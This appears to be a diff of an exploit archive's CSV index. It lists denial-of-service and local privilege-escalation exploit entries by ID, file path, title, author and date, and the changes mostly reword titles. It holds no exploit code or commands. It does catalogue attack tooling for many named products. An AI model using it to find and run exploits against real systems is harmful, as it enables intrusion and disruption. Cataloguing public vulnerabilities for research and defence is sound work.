27790,platforms/osx/dos/27790.txt,"Apple Mac OSX 10.x - ImageIO OpenEXR Image File Remote Denial of Service",2006-05-01,Christian,osx,dos,0
27791,platforms/linux/dos/27791.txt,"Xine 0.99.x - Filename Handling Remote Format String",2006-05-01,KaDaL-X,linux,dos,0
27850,platforms/windows/dos/27850.txt,"Microsoft Infotech Storage Library - Heap Corruption",2006-05-09,"Ruben Santamarta",windows,dos,0
@ -4432,8 +4432,8 @@ id,file,description,date,author,platform,type,port
35489,platforms/multiple/dos/35489.pl,"Perl 5.x - 'Perl_reg_numbered_buff_fetch()' Function Remote Denial of Service",2011-03-23,"Vladimir Perepelitsa",multiple,dos,0
35502,platforms/windows/dos/35502.pl,"eXPert PDF Batch Creator 7.0.880.0 - Denial of Service",2011-03-27,KedAns-Dz,windows,dos,0
35507,platforms/windows/dos/35507.pl,"DivX Player 7 - Multiple Remote Buffer Overflow Vulnerabilities",2011-03-27,KedAns-Dz,windows,dos,0
35530,platforms/windows/dos/35530.py,"Mediacoder 0.8.33 build 5680 - '.m3u' Buffer Overflow (SEH) Denial of Service",2014-12-15,s-dz,windows,dos,0
35531,platforms/windows/dos/35531.py,"Mediacoder 0.8.33 build 5680 - '.lst' Buffer Overflow (SEH) Denial of Service",2014-12-15,s-dz,windows,dos,0
35530,platforms/windows/dos/35530.py,"Mediacoder 0.8.33 build 5680 - '.m3u' Buffer Overflow (SEH) (Denial of Service)",2014-12-15,s-dz,windows,dos,0
35531,platforms/windows/dos/35531.py,"Mediacoder 0.8.33 build 5680 - '.lst' Buffer Overflow (SEH) (Denial of Service)",2014-12-15,s-dz,windows,dos,0
35532,platforms/windows/dos/35532.py,"jaangle 0.98i.977 - Denial of Service",2014-12-15,s-dz,windows,dos,0
35539,platforms/php/dos/35539.txt,"phpMyAdmin 4.0.x/4.1.x/4.2.x - Denial of Service",2014-12-15,"Javer Nieto and Andres Rojas",php,dos,0
35552,platforms/windows/dos/35552.py,"MoviePlay 4.82 - '.avi' Buffer Overflow",2011-03-31,^Xecuti0N3r,windows,dos,0
@ -4532,7 +4532,7 @@ id,file,description,date,author,platform,type,port
36825,platforms/hardware/dos/36825.php,"ZYXEL P-660HN-T1H_IPv6 - Remote Configuration Editor / Web Server Denial of Service",2015-04-23,"Koorosh Ghorbani",hardware,dos,80
36840,platforms/multiple/dos/36840.py,"Wireshark 1.12.4 - Memory Corruption and Access Violation (PoC)",2015-04-27,"Avinash Thapa",multiple,dos,0
36841,platforms/windows/dos/36841.py,"UniPDF 1.2 - 'xml' Buffer Overflow Crash (PoC)",2015-04-27,"Avinash Thapa",windows,dos,0
36847,platforms/windows/dos/36847.py,"i.FTP 2.21 - (SEH) Overflow Crash (PoC)",2015-04-28,"Avinash Thapa",windows,dos,0
36847,platforms/windows/dos/36847.py,"i.FTP 2.21 - Overflow Crash (SEH) (PoC)",2015-04-28,"Avinash Thapa",windows,dos,0
36868,platforms/hardware/dos/36868.pl,"Mercury MR804 Router - Multiple HTTP Header Fields Denial of Service Vulnerabilities",2012-02-21,demonalex,hardware,dos,0
36869,platforms/multiple/dos/36869.txt,"IBM solidDB 6.5.0.8 - 'SELECT' Statement 'WHERE' Condition Denial of Service",2012-02-09,IBM,multiple,dos,0
36881,platforms/multiple/dos/36881.txt,"TestDisk 6.14 - Check_OS2MB Stack Buffer Overflow",2015-05-01,Security-Assessment.com,multiple,dos,0
@ -4791,7 +4791,7 @@ id,file,description,date,author,platform,type,port
38556,platforms/android/dos/38556.txt,"Samsung - seiren Kernel Driver Buffer Overflow",2015-10-28,"Google Security Research",android,dos,0
38557,platforms/android/dos/38557.txt,"Samsung fimg2d - FIMG2D_BITBLT_BLIT ioctl Concurrency Flaw",2015-10-28,"Google Security Research",android,dos,0
38558,platforms/android/dos/38558.txt,"Samsung - SecEmailComposer QUICK_REPLY_BACKGROUND Permissions",2015-10-28,"Google Security Research",android,dos,0
38564,platforms/windows/dos/38564.py,"Sam Spade 1.14 - Scan From IP Address Field (SEH) Overflow Crash (SEH) (PoC)",2015-10-29,"Luis Martínez",windows,dos,0
38564,platforms/windows/dos/38564.py,"Sam Spade 1.14 - Scan From IP Address Field Overflow Crash (SEH) (PoC)",2015-10-29,"Luis Martínez",windows,dos,0
38566,platforms/hardware/dos/38566.py,"NetUSB - Kernel Stack Buffer Overflow",2015-10-29,"Adrián Ruiz Bermudo",hardware,dos,0
38580,platforms/windows/dos/38580.txt,"Microsoft Windows - NtCreateLowBoxToken Handle Capture Local Denial of Service / Privilege Escalation (MS15-111)",2015-10-30,"Google Security Research",windows,dos,0
38589,platforms/linux/dos/38589.c,"Linux Kernel 3.0.5 - 'test_root()' Local Denial of Service",2013-06-05,"Jonathan Salwan",linux,dos,0
@ -4816,7 +4816,7 @@ id,file,description,date,author,platform,type,port
38681,platforms/linux/dos/38681.py,"FBZX 2.10 - Local Stack Based Buffer Overflow",2015-11-11,"Juan Sacco",linux,dos,0
38685,platforms/linux/dos/38685.py,"TACK 1.07 - Local Stack Based Buffer Overflow",2015-11-12,"Juan Sacco",linux,dos,0
38687,platforms/windows/dos/38687.py,"Sam Spade 1.14 - S-Lang Command Field Overflow (SEH)",2015-11-12,"Nipun Jaswal",windows,dos,0
38701,platforms/windows/dos/38701.txt,"TECO SG2 FBD Client 3.51 - '.gfb' Overwrite (SEH) Buffer Overflow",2015-11-16,LiquidWorm,windows,dos,0
38701,platforms/windows/dos/38701.txt,"TECO SG2 FBD Client 3.51 - '.gfb' Overwrite Buffer Overflow (SEH)",2015-11-16,LiquidWorm,windows,dos,0
38702,platforms/windows/dos/38702.txt,"TECO TP3-PCLINK 2.1 - '.tpc' File Handling Buffer Overflow",2015-11-16,LiquidWorm,windows,dos,0
38703,platforms/windows/dos/38703.txt,"TECO AP-PCLINK 1.094 - '.tpc' File Handling Buffer Overflow",2015-11-16,LiquidWorm,windows,dos,0
38705,platforms/windows/dos/38705.py,"Sam Spade 1.14 - Browse URL Buffer Overflow (PoC)",2015-11-16,"Nipun Jaswal",windows,dos,0
@ -5001,7 +5001,7 @@ id,file,description,date,author,platform,type,port
39431,platforms/windows/dos/39431.txt,"Adobe Photoshop CC & Bridge CC - '.iff' File Parsing Memory Corruption",2016-02-09,"Francis Provencher",windows,dos,0
39444,platforms/windows/dos/39444.txt,"Alternate Pic View 2.150 - '.pgm' Crash (PoC)",2016-02-15,"Shantanu Khandelwal",windows,dos,0
39445,platforms/linux/dos/39445.c,"NTPd ntp-4.2.6p5 - 'ctl_putdata()' Buffer Overflow",2016-02-15,"Marcin Kozlowski",linux,dos,0
39447,platforms/windows/dos/39447.py,"Network Scanner 4.0.0.0 - (SEH)Crash (PoC)",2016-02-15,INSECT.B,windows,dos,0
39447,platforms/windows/dos/39447.py,"Network Scanner 4.0.0.0 - Crash (SEH) (PoC)",2016-02-15,INSECT.B,windows,dos,0
39452,platforms/windows/dos/39452.txt,"CyberCop Scanner Smbgrind 5.5 - Buffer Overflow",2016-02-16,hyp3rlinx,windows,dos,0
39454,platforms/linux/dos/39454.txt,"glibc - 'getaddrinfo' Stack Based Buffer Overflow (PoC)",2016-02-16,"Google Security Research",linux,dos,0
39460,platforms/multiple/dos/39460.txt,"Adobe Flash - Out-of-Bounds Image Read",2016-02-17,"Google Security Research",multiple,dos,0
@ -5052,7 +5052,7 @@ id,file,description,date,author,platform,type,port
39551,platforms/multiple/dos/39551.txt,"Putty pscp 0.66 - Stack Buffer Overwrite",2016-03-10,tintinweb,multiple,dos,0
39555,platforms/linux/dos/39555.txt,"Linux Kernel 3.10.0-229.x (CentOS / RHEL 7.1) - 'snd-usb-audio' Crash (PoC)",2016-03-14,"OpenSource Security",linux,dos,0
39556,platforms/linux/dos/39556.txt,"Linux Kernel 3.10.0-229.x (CentOS / RHEL 7.1) - 'iowarrior' Driver Crash (PoC)",2016-03-14,"OpenSource Security",linux,dos,0
39557,platforms/windows/dos/39557.py,"Zortam Mp3 Media Studio 20.15 - Overflow (SEH) Denial of Service",2016-03-14,INSECT.B,windows,dos,0
39557,platforms/windows/dos/39557.py,"Zortam Mp3 Media Studio 20.15 - Overflow (SEH) (Denial of Service)",2016-03-14,INSECT.B,windows,dos,0
39560,platforms/windows/dos/39560.txt,"Microsoft Windows Kernel - 'ATMFD.dll' OTF Font Processing Pool-Based Buffer Overflow (MS16-026)",2016-03-14,"Google Security Research",windows,dos,0
39561,platforms/windows/dos/39561.txt,"Microsoft Windows Kernel - 'ATMFD.dll' OTF Font Processing Stack Corruption (MS16-026)",2016-03-14,"Google Security Research",windows,dos,0
39562,platforms/windows/dos/39562.html,"Microsoft Internet Explorer - Read AV in MSHTML!Layout::LayoutBuilderDivider::BuildPageLayout (MS16-023)",2016-03-14,"Google Security Research",windows,dos,0
@ -5183,7 +5183,7 @@ id,file,description,date,author,platform,type,port
39994,platforms/windows/dos/39994.html,"Microsoft Internet Explorer 11 - Garbage Collector Attribute Type Confusion (MS16-063)",2016-06-21,Skylined,windows,dos,0
40014,platforms/hardware/dos/40014.txt,"Magnet Networks Tesley CPVA 642 Router - Weak WPA-PSK Passphrase Algorithm",2016-06-27,"Matt O'Connor",hardware,dos,0
40031,platforms/multiple/dos/40031.txt,"Symantec AntiVirus - Multiple Remote Memory Corruption Unpacking RAR",2016-06-29,"Google Security Research",multiple,dos,0
40032,platforms/multiple/dos/40032.txt,"Symantec AntiVirus - Remote Stack Buffer Overflow in dec2lha Library",2016-06-29,"Google Security Research",multiple,dos,0
40032,platforms/multiple/dos/40032.txt,"Symantec AntiVirus - 'dec2lha Library' Remote Stack Buffer Overflow",2016-06-29,"Google Security Research",multiple,dos,0
40034,platforms/multiple/dos/40034.txt,"Symantec AntiVirus - Heap Overflow Modifying MIME Messages",2016-06-29,"Google Security Research",multiple,dos,0
40035,platforms/multiple/dos/40035.txt,"Symantec AntiVirus - Integer Overflow in TNEF Decoder",2016-06-29,"Google Security Research",multiple,dos,0
40036,platforms/multiple/dos/40036.txt,"Symantec AntiVirus - Missing Bounds Checks in dec2zip ALPkOldFormatDecompressor::UnShrink",2016-06-29,"Google Security Research",multiple,dos,0
@ -5550,7 +5550,7 @@ id,file,description,date,author,platform,type,port
42188,platforms/multiple/dos/42188.html,"WebKit JSC - JSGlobalObject::haveABadTime Causes Type Confusions",2017-06-16,"Google Security Research",multiple,dos,0
42189,platforms/multiple/dos/42189.html,"WebKit JSC - arrayProtoFuncSplice does not Initialize all Indices",2017-06-16,"Google Security Research",multiple,dos,0
42190,platforms/multiple/dos/42190.html,"WebKit JSC - JIT Optimization Check Failed in IntegerCheckCombiningPhase::handleBlock",2017-06-16,"Google Security Research",multiple,dos,0
42191,platforms/multiple/dos/42191.html,"WebKit JSC - Heap Buffer Overflow in Intl.getCanonicalLocales",2017-06-16,"Google Security Research",multiple,dos,0
42191,platforms/multiple/dos/42191.html,"WebKit JSC - 'Intl.getCanonicalLocales' Heap Buffer Overflow",2017-06-16,"Google Security Research",multiple,dos,0
42198,platforms/linux/dos/42198.txt,"GNU binutils - 'rx_decode_opcode' Buffer Overflow",2017-06-19,"Alexandre Adamski",linux,dos,0
42199,platforms/linux/dos/42199.txt,"GNU binutils - 'disassemble_bytes' Heap Overflow",2017-06-19,"Alexandre Adamski",linux,dos,0
42200,platforms/linux/dos/42200.txt,"GNU binutils - 'bfd_get_string' Stack Buffer Overflow",2017-06-19,"Alexandre Adamski",linux,dos,0
@ -5672,7 +5672,7 @@ id,file,description,date,author,platform,type,port
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
15,platforms/osx/local/15.c,"Apple Mac OSX 10.2.4 - DirectoryService (PATH) Privilege Escalation",2003-04-18,"Neeko Oni",osx,local,0
21,platforms/linux/local/21.c,"Qpopper 4.0.x - poppassd Privilege Escalation",2003-04-29,Xpl017Elz,linux,local,0
29,platforms/bsd/local/29.c,"Firebird 1.0.2 FreeBSD 4.7-RELEASE - Privilege Escalation",2003-05-12,bob,bsd,local,0
29,platforms/bsd/local/29.c,"Firebird 1.0.2 (FreeBSD 4.7-RELEASE) - Privilege Escalation",2003-05-12,bob,bsd,local,0
31,platforms/linux/local/31.pl,"CDRTools CDRecord 2.0 (Mandrake / Slackware) - Privilege Escalation",2003-05-14,anonymous,linux,local,0
32,platforms/windows/local/32.c,"Microsoft Windows XP - 'explorer.exe' Buffer Overflow",2003-05-21,einstein,windows,local,0
40,platforms/linux/local/40.pl,"Mandrake Linux 8.2 /usr/mail - Local Exploit",2003-06-10,anonymous,linux,local,0
@ -6585,7 +6585,7 @@ id,file,description,date,author,platform,type,port
10072,platforms/multiple/local/10072.c,"Multiple Vendor - TLS Protocol Session Renegotiation Security",2009-11-12,"Marsh Ray",multiple,local,0
10076,platforms/osx/local/10076.c,"VMware Fusion 2.0.5 - vmx86 kext Kernel Privilege Escalation",2009-10-02,mu-b,osx,local,0
10078,platforms/osx/local/10078.c,"VMware Fusion 2.0.5 - vmx86 kext Local Exploit (PoC)",2009-10-02,mu-b,osx,local,0
33426,platforms/windows/local/33426.pl,"CyberLink Power2Go Essential 9.0.1002.0 - Registry Buffer Overflow (Unicode SEH)",2014-05-19,"Mike Czumak",windows,local,0
33426,platforms/windows/local/33426.pl,"CyberLink Power2Go Essential 9.0.1002.0 - Registry Buffer Overflow (SEH Unicode)",2014-05-19,"Mike Czumak",windows,local,0
10084,platforms/windows/local/10084.txt,"Quick Heal 10.00 SP1 - Privilege Escalation",2009-10-13,"Maxim A. Kulakov",windows,local,0
10201,platforms/windows/local/10201.pl,"TEKUVA - Password Reminder Authentication Bypass",2009-11-21,iqlusion,windows,local,0
10207,platforms/multiple/local/10207.txt,"VMware Virtual 8086 - Linux Local Ring0 Exploit",2009-10-27,"Tavis Ormandy and Julien Tinnes",multiple,local,0
@ -6655,12 +6655,12 @@ id,file,description,date,author,platform,type,port
10782,platforms/windows/local/10782.pl,"Mini-stream Ripper 3.0.1.1 - '.pls' Universal Buffer Overflow (Perl)",2009-12-29,jacky,windows,local,0
10786,platforms/windows/local/10786.py,"Soritong 1.0 - Universal Buffer Overflow (Python)",2009-12-29,jacky,windows,local,0
10787,platforms/windows/local/10787.py,"Mini-stream Ripper 3.0.1.1 - '.pls' Universal Buffer Overflow (Python)",2009-12-29,jacky,windows,local,0
10797,platforms/windows/local/10797.py,"Quick Player 1.2 - Unicode Buffer Overflow",2009-12-30,mr_me,windows,local,0
10827,platforms/windows/local/10827.rb,"DJ Studio Pro 5.1.6.5.2 - (SEH) Exploit",2009-12-30,"Sébastien Duquette",windows,local,0
10797,platforms/windows/local/10797.py,"Quick Player 1.2 - Unicode Buffer Overflow (1)",2009-12-30,mr_me,windows,local,0
10827,platforms/windows/local/10827.rb,"DJ Studio Pro 5.1.6.5.2 - Exploit (SEH)",2009-12-30,"Sébastien Duquette",windows,local,0
10936,platforms/windows/local/10936.c,"PlayMeNow (Windows XP SP2 French) - '.M3U' Playlist Buffer Overflow",2010-01-03,bibi-info,windows,local,0
11010,platforms/windows/local/11010.rb,"PlayMeNow 7.3/7.4 - Buffer Overflow (Metasploit)",2010-01-06,blake,windows,local,0
11029,platforms/multiple/local/11029.txt,"DirectAdmin 1.33.6 - Symlink Security Bypass",2010-01-06,alnjm33,multiple,local,0
11046,platforms/windows/local/11046.py,"Quick Player 1.2 - Unicode Buffer Overflow (Bindshell)",2010-01-06,sinn3r,windows,local,0
11046,platforms/windows/local/11046.py,"Quick Player 1.2 - Unicode Buffer Overflow (2)",2010-01-06,sinn3r,windows,local,0
11079,platforms/windows/local/11079.rb,"Audiotran 1.4.1 (Windows XP SP2/SP3 English) - Buffer Overflow",2010-01-10,"Sébastien Duquette",windows,local,0
11093,platforms/windows/local/11093.rb,"Soritong 1.0 - Universal Buffer Overflow (SEH) (Metasploit)",2010-01-10,fb1h2s,windows,local,0
11109,platforms/windows/local/11109.rb,"Audiotran 1.4.1 - '.pls' Stack Overflow (Metasploit)",2010-01-11,dookie,windows,local,0
@ -6683,7 +6683,7 @@ id,file,description,date,author,platform,type,port
11255,platforms/windows/local/11255.pl,"Winamp 5.572 - 'whatsnew.txt' Stack Overflow",2010-01-25,Dz_attacker,windows,local,0
11256,platforms/windows/local/11256.pl,"Winamp 5.572 (Windows XP SP3 DE) - 'whatsnew.txt' Local Buffer Overflow",2010-01-25,NeoCortex,windows,local,0
11264,platforms/windows/local/11264.rb,"South River Technologies WebDrive Service 9.02 build 2232 - Bad Security Descriptor Privilege Escalation",2010-01-26,Trancer,windows,local,0
11267,platforms/windows/local/11267.py,"Winamp 5.572 - (SEH) Exploit",2010-01-26,TecR0c,windows,local,0
11267,platforms/windows/local/11267.py,"Winamp 5.572 - Exploit (SEH)",2010-01-26,TecR0c,windows,local,0
11281,platforms/windows/local/11281.c,"Rising AntiVirus 2008/2009/2010 - Privilege Escalation",2010-01-28,Dlrow,windows,local,0
11314,platforms/windows/local/11314.py,"CoreFTP 2.1 b1637 - (Password field) Universal Buffer Overflow",2010-02-02,mr_me,windows,local,0
11315,platforms/windows/local/11315.c,"DeepBurner pro 1.9.0.228 - '.dbr' file Buffer Overflow (Universal)",2010-02-02,"fl0 fl0w",windows,local,0
@ -6733,7 +6733,7 @@ id,file,description,date,author,platform,type,port
12008,platforms/windows/local/12008.pl,"TugZip 3.5 Archiver - '.ZIP' File Buffer Overflow",2010-04-01,Lincoln,windows,local,0
12012,platforms/windows/local/12012.txt,"Free MP3 CD Ripper 2.6 - '.wav' Exploit",2010-04-02,"Richard leahy",windows,local,0
12024,platforms/windows/local/12024.php,"Zip Unzip 6.0 - '.zip' Stack Buffer Overflow (PoC)",2010-04-03,mr_me,windows,local,0
12035,platforms/windows/local/12035.pl,"ZipScan 2.2c - (SEH) Exploit",2010-04-03,"Lincoln and corelanc0d3r",windows,local,0
12035,platforms/windows/local/12035.pl,"ZipScan 2.2c - Exploit (SEH)",2010-04-03,"Lincoln and corelanc0d3r",windows,local,0
12051,platforms/windows/local/12051.php,"PHP 6.0 Dev - 'str_transliterate()' Buffer Overflow",2010-04-04,"Yakir Wizman",windows,local,0
12053,platforms/windows/local/12053.py,"ZipCentral - '.zip' File (SEH)",2010-04-04,TecR0c,windows,local,0
12059,platforms/windows/local/12059.pl,"eZip Wizard 3.0 - '.zip' File (SEH)",2010-04-04,"Lincoln and corelanc0d3r",windows,local,0
@ -6744,7 +6744,7 @@ id,file,description,date,author,platform,type,port
12189,platforms/windows/local/12189.php,"PHP 6.0 Dev - 'str_transliterate()' Buffer Overflow (NX + ASLR Bypass)",2010-04-13,ryujin,windows,local,0
12213,platforms/windows/local/12213.c,"Micropoint ProActive Denfense 'Mp110013.sys' 1.3.10123.0 - Privilege Escalation",2010-04-14,MJ0011,windows,local,0
20109,platforms/windows/local/20109.rb,"Photodex ProShow Producer 5.0.3256 - load File Handling Buffer Overflow (Metasploit)",2012-07-27,Metasploit,windows,local,0
12255,platforms/windows/local/12255.rb,"Winamp 5.572 - 'whatsnew.txt' (SEH) (Metasploit)",2010-04-16,blake,windows,local,0
12255,platforms/windows/local/12255.rb,"Winamp 5.572 - 'whatsnew.txt' Exploit (SEH) (Metasploit)",2010-04-16,blake,windows,local,0
12261,platforms/windows/local/12261.rb,"Archive Searcher - '.zip' Stack Overflow",2010-04-16,Lincoln,windows,local,0
12293,platforms/windows/local/12293.py,"TweakFS 1.0 - (FSX Edition) Stack Buffer Overflow",2010-04-19,corelanc0d3r,windows,local,0
12326,platforms/windows/local/12326.py,"ZipGenius 6.3.1.2552 - 'zgtips.dll' Stack Buffer Overflow",2010-04-21,corelanc0d3r,windows,local,0
@ -6767,14 +6767,14 @@ id,file,description,date,author,platform,type,port
12677,platforms/windows/local/12677.html,"Rumba FTP Client 'FTPSFtp.dll' 4.2.0.0 - 'OpenSession()' Buffer Overflow",2010-05-21,sinn3r,windows,local,0
12710,platforms/windows/local/12710.c,"Kingsoft Webshield 'KAVSafe.sys' 2010.4.14.609 (2010.5.23) - Kernel Mode Privilege Escalation",2010-05-23,"Xuanyuan Smart",windows,local,0
12803,platforms/windows/local/12803.html,"IP2location.dll 1.0.0.1 - Function 'Initialize()' Buffer Overflow",2010-05-30,sinn3r,windows,local,0
12821,platforms/windows/local/12821.py,"Mediacoder 0.7.3.4672 - (SEH) Exploit",2010-05-31,Stoke,windows,local,0
12821,platforms/windows/local/12821.py,"Mediacoder 0.7.3.4672 - Exploit (SEH)",2010-05-31,Stoke,windows,local,0
40335,platforms/windows/local/40335.txt,"ArcServe UDP 6.0.3792 Update 2 Build 516 - Unquoted Service Path Privilege Escalation",2016-09-05,sh4d0wman,windows,local,0
15499,platforms/windows/local/15499.py,"Free WMA MP3 Converter 1.1 - Buffer Overflow (SEH)",2010-11-12,Dr_IDE,windows,local,0
13756,platforms/windows/local/13756.py,"VUPlayer 2.49 - '.m3u' File Universal Buffer Overflow (DEP Bypass) (1)",2010-06-07,mr_me,windows,local,0
13760,platforms/windows/local/13760.py,"Audio Converter 8.1 - Stack Buffer Overflow (PoC)",2010-06-07,sud0,windows,local,0
13761,platforms/windows/local/13761.pl,"Easy CD-DA Recorder 2007 - Buffer Overflow (SEH)",2010-06-07,chap0,windows,local,0
13763,platforms/windows/local/13763.pl,"Audio Converter 8.1 - Stack Buffer Overflow (PoC) ROP/WPM",2010-06-07,sud0,windows,local,0
13767,platforms/windows/local/13767.c,"SureThing CD Labeler (m3u/pls) - Unicode Stack Overflow (PoC)",2010-06-08,mr_me,windows,local,0
13767,platforms/windows/local/13767.c,"SureThing CD Labeler - '.m3u/.pls' Unicode Stack Overflow (PoC)",2010-06-08,mr_me,windows,local,0
13768,platforms/php/local/13768.py,"Castripper 2.50.70 - '.pls' File Stack Buffer Overflow (DEP Bypass)",2010-06-08,mr_me,php,local,0
13806,platforms/windows/local/13806.txt,"ActivePerl 5.8.8.817 - Buffer Overflow",2010-06-09,PoisonCode,windows,local,0
13820,platforms/windows/local/13820.pl,"Power Tab Editor 1.7 (Build 80) - Buffer Overflow",2010-06-11,sud0,windows,local,0
@ -6783,8 +6783,8 @@ id,file,description,date,author,platform,type,port
13907,platforms/windows/local/13907.py,"Winamp 5.572 - Local Buffer Overflow (EIP + SEH DEP Bypass)",2010-06-17,TecR0c,windows,local,0
13909,platforms/windows/local/13909.py,"Batch Audio Converter Lite Edition 1.0.0.0 - Stack Buffer Overflow (SEH)",2010-06-17,modpr0be,windows,local,0
13940,platforms/windows/local/13940.pl,"Orbital Viewer 1.04 - '.ov' Local Universal Stack Overflow (SEH)",2010-06-19,Crazy_Hacker,windows,local,0
13942,platforms/windows/local/13942.pl,"MoreAmp - '.maf' Local Stack Buffer Overflow (SEH) (calc)",2010-06-20,Madjix,windows,local,0
13998,platforms/windows/local/13998.pl,"BlazeDVD 6.0 - '.plf' File (SEH) Universal Buffer Overflow",2010-06-23,Madjix,windows,local,0
13942,platforms/windows/local/13942.pl,"MoreAmp - '.maf' Local Stack Buffer Overflow (SEH)",2010-06-20,Madjix,windows,local,0
13998,platforms/windows/local/13998.pl,"BlazeDVD 6.0 - '.plf' File Universal Buffer Overflow (SEH)",2010-06-23,Madjix,windows,local,0
14002,platforms/freebsd/local/14002.c,"FreeBSD Kernel - 'nfs_mount()' Exploit",2010-06-23,"Patroklos Argyroudis",freebsd,local,0
14029,platforms/windows/local/14029.py,"NO-IP.com Dynamic DNS Update Client 2.2.1 - 'Request' Insecure Encoding Algorithm",2010-06-24,sinn3r,windows,local,0
14044,platforms/windows/local/14044.pl,"WM Downloader 2.9.2 - Stack Buffer Overflow",2010-06-25,Madjix,windows,local,0
@ -6800,7 +6800,7 @@ id,file,description,date,author,platform,type,port
14256,platforms/windows/local/14256.txt,"HP OpenView Network Node Manager (OV NNM) 7.53 - 'ovwebsnmpsrv.exe' Buffer Overflow (SEH)",2010-07-07,bitform,windows,local,0
14258,platforms/windows/local/14258.py,"GSM SIM Utility 5.15 - Local Exploit (Direct RET)",2010-07-07,chap0,windows,local,0
14339,platforms/linux/local/14339.sh,"Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (2)",2010-07-12,anonymous,linux,local,0
14352,platforms/windows/local/14352.rb,"ASX to MP3 Converter 3.1.2.1 - (SEH) Multiple OS ASLR + DEP Bypass (Metasploit)",2010-07-13,Node,windows,local,0
14352,platforms/windows/local/14352.rb,"ASX to MP3 Converter 3.1.2.1 - Multiple OS ASLR + DEP Bypass (SEH) (Metasploit)",2010-07-13,Node,windows,local,0
14361,platforms/windows/local/14361.py,"Microsoft Excel - 0x5D record Stack Overflow (MS10-038)",2010-07-14,webDEViL,windows,local,0
14373,platforms/win_x86/local/14373.pl,"Mini-stream RM-MP3 Converter 3.1.2.1 - '.pls' Stack Buffer Overflow Universal",2010-07-16,Madjix,win_x86,local,0
14397,platforms/windows/local/14397.rb,"MoreAmp - Buffer Overflow (SEH) (Metasploit)",2010-07-17,Madjix,windows,local,0
@ -6897,20 +6897,20 @@ id,file,description,date,author,platform,type,port
14959,platforms/windows/local/14959.py,"Acoustica MP3 Audio Mixer 2.471 - Extended .M3U Directives (SEH)",2010-09-09,"Carlos Mario Penagos Hollmann",windows,local,0
14961,platforms/win_x86/local/14961.py,"Audiotran 1.4.2.4 - Overflow (SEH)",2010-09-09,"Abhishek Lyall",win_x86,local,0
14982,platforms/windows/local/14982.py,"Adobe Acrobat and Reader - 'pushstring' Memory Corruption",2010-09-12,Abysssec,windows,local,0
15013,platforms/windows/local/15013.pl,"MP3 Workstation 9.2.1.1.2 - (SEH) Exploit",2010-09-15,"sanjeev gupta",windows,local,0
15013,platforms/windows/local/15013.pl,"MP3 Workstation 9.2.1.1.2 - Exploit (SEH)",2010-09-15,"sanjeev gupta",windows,local,0
15022,platforms/windows/local/15022.py,"Honestech VHS to DVD 3.0.30 Deluxe - Local Buffer Overflow (SEH)",2010-09-16,"Brennon Thomas",windows,local,0
15023,platforms/lin_x86-64/local/15023.c,"Linux Kernel < 2.6.36-rc4-git2 (x86-64) - 'ia32syscall' Emulation Privilege Escalation",2010-09-16,"ben hawkes",lin_x86-64,local,0
15024,platforms/lin_x86-64/local/15024.c,"Linux Kernel 2.6.27 < 2.6.36 (RedHat x86-64) - 'compat' Privilege Escalation",2010-09-16,Ac1dB1tCh3z,lin_x86-64,local,0
15026,platforms/windows/local/15026.py,"BACnet OPC Client - Buffer Overflow (1)",2010-09-16,"Jeremy Brown",windows,local,0
15031,platforms/windows/local/15031.py,"DJ Studio Pro 8.1.3.2.1 - (SEH) Exploit",2010-09-17,"Abhishek Lyall",windows,local,0
15031,platforms/windows/local/15031.py,"DJ Studio Pro 8.1.3.2.1 - Exploit (SEH)",2010-09-17,"Abhishek Lyall",windows,local,0
15033,platforms/windows/local/15033.py,"A-PDF All to MP3 Converter 1.1.0 - Universal Local (SEH)",2010-09-17,modpr0be,windows,local,0
15047,platforms/windows/local/15047.rb,"Audiotran 1.4.2.4 - Overflow (SEH) (DEP Bypass)",2010-09-19,"Muhamad Fadzil Ramli",windows,local,0
15099,platforms/windows/local/15099.rb,"SnackAmp 3.1.3B - SMP Buffer Overflow (SEH)",2010-09-24,"James Fitts",windows,local,0
15069,platforms/windows/local/15069.py,"Acoustica Audio Converter Pro 1.1 (build 25) - Heap Overflow (.mp3 / .wav / .ogg / .wma) (PoC)",2010-09-21,"Carlos Mario Penagos Hollmann",windows,local,0
15074,platforms/linux/local/15074.sh,"mountall 2.15.2 (Ubuntu 10.04/10.10) - Privilege Escalation",2010-09-21,fuzz,linux,local,0
15081,platforms/windows/local/15081.rb,"MP3 Workstation 9.2.1.1.2 - (SEH) (Metasploit)",2010-09-22,Madjix,windows,local,0
15081,platforms/windows/local/15081.rb,"MP3 Workstation 9.2.1.1.2 - Exploit (SEH) (Metasploit)",2010-09-22,Madjix,windows,local,0
15094,platforms/windows/local/15094.py,"Microsoft Excel - OBJ Record Stack Overflow",2010-09-24,Abysssec,windows,local,0
15133,platforms/windows/local/15133.pl,"iworkstation 9.3.2.1.4 - (SEH) Exploit",2010-09-27,"sanjeev gupta",windows,local,0
15133,platforms/windows/local/15133.pl,"iworkstation 9.3.2.1.4 - Exploit (SEH)",2010-09-27,"sanjeev gupta",windows,local,0
15134,platforms/windows/local/15134.rb,"Digital Music Pad 8.2.3.3.4 - Overflow (SEH) (Metasploit)",2010-09-27,"Abhishek Lyall",windows,local,0
15150,platforms/linux/local/15150.c,"Linux Kernel < 2.6.36-rc6 (RedHat / Ubuntu 10.04) - 'pktcdvd' Kernel Memory Disclosure (PoC)",2010-09-29,"Jon Oberheide",linux,local,0
15155,platforms/linux/local/15155.c,"XFS - Deleted Inode Local Information Disclosure",2010-09-29,"Red Hat",linux,local,0
@ -6957,7 +6957,7 @@ id,file,description,date,author,platform,type,port
15693,platforms/windows/local/15693.html,"Viscom VideoEdit Gold ActiveX 8.0 - Remote Code Execution",2010-12-06,Rew,windows,local,0
15696,platforms/windows/local/15696.txt,"Alice 2.2 - Arbitrary Code Execution",2010-12-06,Rew,windows,local,0
15704,platforms/linux/local/15704.c,"Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04) - 'Full-Nelson.c' Privilege Escalation",2010-12-07,"Dan Rosenberg",linux,local,0
15706,platforms/windows/local/15706.txt,"Winamp 5.6 - Arbitrary Code Execution in MIDI Parser",2010-12-08,"Kryptos Logic",windows,local,0
15706,platforms/windows/local/15706.txt,"Winamp 5.6 - 'MIDI Parser' Arbitrary Code Execution",2010-12-08,"Kryptos Logic",windows,local,0
15745,platforms/linux/local/15745.txt,"IBM Tivoli Storage Manager (TSM) - Privilege Escalation",2010-12-15,"Kryptos Logic",linux,local,0
